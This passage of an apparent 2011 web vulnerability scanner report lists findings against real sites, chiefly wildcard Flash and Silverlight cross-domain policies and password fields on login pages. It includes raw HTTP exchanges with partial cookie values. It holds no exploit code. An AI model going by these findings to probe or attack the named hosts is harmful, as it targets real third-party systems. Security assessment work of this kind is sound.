/> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> <allow-access-from domain="static.ak.fbcdn.net" /> <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.meebo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.meebo.com |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 09 May 2011 15:35:02 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 303 Last-Modified: Thu, 28 Apr 2011 16:54:16 GMT Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="www.meebo.com"/> <allow-access-from domain="*.meebo.com"/> <allow-access-from domain="meebo.com"/> <allow-access-from domain="*.meebome.com"/> <allow-access-from domain="www.meebome.com"/> <allow-access-from domain="meebome.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.npr.org |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.npr.org |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:46 GMT Server: Apache/2.2.14 (Unix) Last-Modified: Thu, 07 Apr 2011 20:17:23 GMT Accept-Ranges: bytes Content-Length: 455 Cache-Control: max-age=600 Expires: Mon, 09 May 2011 15:49:46 GMT Keep-Alive: timeout=10, max=4945 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.threespot.com"/> <allow-access-from domain="*.npr.org" /> <allow-access-from domain="*.digitaria.com"/> <allow-access-from domain="www.kqed.org" /> <allow-access-from domain="*.iheartnpr.org" /> <allow-access-from domain="apps.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.usatoday.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT Accept-Ranges: bytes ETag: "befaf11117e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 09 May 2011 15:36:43 GMT Connection: close Content-Length: 1558 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="projects.usatoday.com"/> <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://api.twitter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.twitter.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:41 GMT Server: hi Status: 200 OK Last-Modified: Wed, 04 May 2011 17:32:26 GMT Content-Type: application/xml Content-Length: 561 Set-Cookie: k=173.193.214.243 Cache-Control: max-age=1800 Expires: Mon, 09 May 2011 16:09:41 GMT Vary: Accept-Encoding Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="twitter.com" /> ...[SNIP]... <allow-access-from domain="search.twitter.com" /> <allow-access-from domain="static.twitter.com" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT Date: Mon, 09 May 2011 15:35:02 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.pointroll.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ads.pointroll.com |
HTTP/1.1 200 OK Content-Length: 348 Content-Type: text/xml Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT Accept-Ranges: bytes ETag: "80a33917f91cb1:11e6" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Date: Mon, 09 May 2011 15:35:08 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*" /> </allow-from> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Tue, 10 May 2011 15:34:58 GMT Date: Mon, 09 May 2011 15:34:58 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.voicefive.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.voicefive.com |
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Tue, 10 May 2011 15:35:23 GMT Date: Mon, 09 May 2011 15:35:23 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: content.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 09 May 2011 15:38:09 GMT Connection: close Content-Length: 730 <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://contextweb |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: contextweb.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 730 Date: Mon, 09 May 2011 15:36:35 GMT Connection: close <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://data.usatoday.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: data.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 730 Date: Mon, 09 May 2011 15:37:58 GMT Connection: close <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: i.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 730 Date: Mon, 09 May 2011 15:36:39 GMT Connection: close <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.csmonitor |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.csmonitor.com |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:35:20 GMT Server: Omniture DC/2.0.0 xserver: www96 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.npr.org |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.npr.org |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:57 GMT Server: Omniture DC/2.0.0 xserver: www391 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Mon, 09 May 2011 14:23:30 GMT Expires: Fri, 06 May 2011 14:23:11 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 4295 Cache-Control: public, max-age=86400 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:35:19 GMT Server: Apache Cache-Control: max-age=604800 Expires: Mon, 16 May 2011 15:35:19 GMT Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT ETag: "ff-4adbc4fc" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: application/xml <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </grant ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://spd.pointroll.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: spd.pointroll.com |
HTTP/1.0 200 OK Content-Length: 348 Content-Type: text/xml Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT Accept-Ranges: bytes ETag: "80a33917f91cb1:128b" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Date: Mon, 09 May 2011 15:39:55 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*" /> </allow-from> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://speed.pointroll |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: speed.pointroll.com |
HTTP/1.0 200 OK Content-Length: 348 Content-Type: text/xml Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT Accept-Ranges: bytes ETag: "80a33917f91cb1:527" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:35:10 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*" /> </allow-from> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://usatoday1.112.2o7 |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: usatoday1.112.2o7.net |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:51 GMT Server: Omniture DC/2.0.0 xserver: www653 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.usatoday.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT Accept-Ranges: bytes ETag: "80d976d8f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 09 May 2011 15:36:43 GMT Connection: close Content-Length: 730 <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /login/ |
GET /login/ HTTP/1.1 Host: www.therepublic.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FreakAuth=423b870899 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:35 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-Type: text/html Content-Length: 24003 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>The Republic - ...[SNIP]... </p> <form id="login" method="post" action="./login/process/" <p> ...[SNIP]... </span><input type="password" name="login_password" id="login_password" size="30"/> <a href="./login/forgot/"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /login/register/ |
GET /login/register/ HTTP/1.1 Host: www.therepublic.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:36:57 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Content-Type: text/html Content-Length: 25776 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>The Republic - ...[SNIP]... </p> <form id="login" method="post" action="./login/reg_step1 <p> ...[SNIP]... </span><input type="password" name="login_password" id="login_password" size="30"/></p> ...[SNIP]... </span><input type="password" name="login_password_rep" id="login_password_rep" size="30"/></p> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://shop.npr.org |
Path: | /index.php |
GET /index.php?pcsid Host: shop.npr.org Connection: keep-alive Referer: http://shop.npr.org/index Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=67dd49e50c |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:43:58 GMT Server: Apache/2.0.52 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: ShoppingCartSession Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 65651 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.groupon.com |
Path: | /dallas/ |
GET /dallas/ HTTP/1.1 Host: www.groupon.com Connection: keep-alive Referer: https://www.groupon.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare |
HTTP/1.1 302 Moved Temporarily Server: EdgePrismSSL Date: Mon, 09 May 2011 15:38:06 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: adchemy_id=; path=/ Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:06 GMT Set-Cookie: _thepoint=8dd18fc853 Status: 302 Location: http://www.groupon.com X-Runtime: 11 Cache-Control: no-cache Content-Length: 96 <html><body>You are being <a href="http://www.groupon |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.groupon.com |
Path: | /learn |
GET /learn HTTP/1.1 Host: www.groupon.com Connection: keep-alive Referer: https://www.groupon.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare |
HTTP/1.1 302 Moved Temporarily Server: EdgePrismSSL Date: Mon, 09 May 2011 15:38:24 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: adchemy_id=; path=/ Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:24 GMT Set-Cookie: _thepoint=8dd18fc853 Status: 302 Location: http://www.groupon.com X-Runtime: 15 Cache-Control: no-cache Content-Length: 94 <html><body>You are being <a href="http://www.groupon |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.groupon.com |
Path: | /login |
GET /login HTTP/1.1 Host: www.groupon.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare |
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Mon, 09 May 2011 15:35:57 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: adchemy_id=; path=/ Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: _thepoint=8dd18fc853 Status: 200 ETag: "43fe666874ea7a2ba3c X-Runtime: 85 Cache-Control: private, max-age=0, must-revalidate Content-Length: 36760 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www < ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.groupon.com |
Path: | /mobile |
GET /mobile HTTP/1.1 Host: www.groupon.com Connection: keep-alive Referer: https://www.groupon.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare |
HTTP/1.1 302 Moved Temporarily Server: EdgePrismSSL Date: Mon, 09 May 2011 15:38:30 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: adchemy_id=; path=/ Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT Set-Cookie: _thepoint=8dd18fc853 Status: 302 Location: http://www.groupon.com X-Runtime: 13 Cache-Control: no-cache Content-Length: 95 <html><body>You are being <a href="http://www.groupon |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.groupon.com |
Path: | /users |
POST /users HTTP/1.1 Host: www.groupon.com Connection: keep-alive Referer: https://www.groupon.com Cache-Control: max-age=0 Origin: https://www.groupon.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare Content-Length: 231 authenticity_token ...[SNIP]... |
HTTP/1.1 302 Moved Temporarily Server: EdgePrismSSL Date: Mon, 09 May 2011 15:36:13 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: adchemy_id=; path=/ Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: _thepoint=8dd18fc853 Status: 302 Location: https://www.groupon.com X-Runtime: 62 Cache-Control: no-cache Content-Length: 99 <html><body>You are being <a href="https://www.groupon |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.groupon.com |
Path: | /users/new |
GET /users/new HTTP/1.1 Host: www.groupon.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare |
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Mon, 09 May 2011 15:36:08 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Set-Cookie: adchemy_id=; path=/ Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT Set-Cookie: _thepoint=8dd18fc853 Status: 200 ETag: "bac993c076753d5871c X-Runtime: 612 Cache-Control: private, max-age=0, must-revalidate Content-Length: 36677 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www < ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://login.npr.org |
Path: | /openid/embed |
GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org Host: login.npr.org Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=67dd49e50c |
HTTP/1.1 200 OK Server: nginx Date: Mon, 09 May 2011 15:39:49 GMT Content-Type: text/html Last-Modified: Thu, 05 May 2011 02:07:43 GMT Connection: keep-alive Cache-Control: private, max-age=0, must-revalidate Content-Length: 4792 <!DOCTYPE html> <html dir="ltr" > <head> <title>Sign in - Powered by Janrain</title> <meta charset="UTF-8" /> <script src="https://s3.amazonaws ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.groupon.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: campaign_click_url= |
HTTP/1.1 302 Found Location: http://static.ak.fbcdn Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.29.48 X-Cnection: close Date: Mon, 09 May 2011 15:35:52 GMT Content-Length: 0 |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.npr.org |
Path: | /templates/reg/login.php |
GET /templates/reg/login.php HTTP/1.1 Host: www.npr.org Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: rosi=75c427ffc47b22e |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:48 GMT Server: Apache X-Powered-By: PHP/5.2.9 Cache-Control: max-age=0 Expires: Mon, 09 May 2011 15:39:48 GMT Content-Type: text/html Vary: Accept-Encoding, User-Agent Connection: Keep-Alive Content-Length: 16829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="jrLogin"> <iframe src="http://login.npr.org ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /BlackBerry/default.aspx |
GET /BlackBerry/default.aspx HTTP/1.1 Host: mobile.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-IDMCDN: Normal: X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 09 May 2011 15:41:46 GMT Content-Length: 4272 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="descripti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzMjE1OTg0 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://mobile.fox8live |
Path: | /business/story/McDonalds |
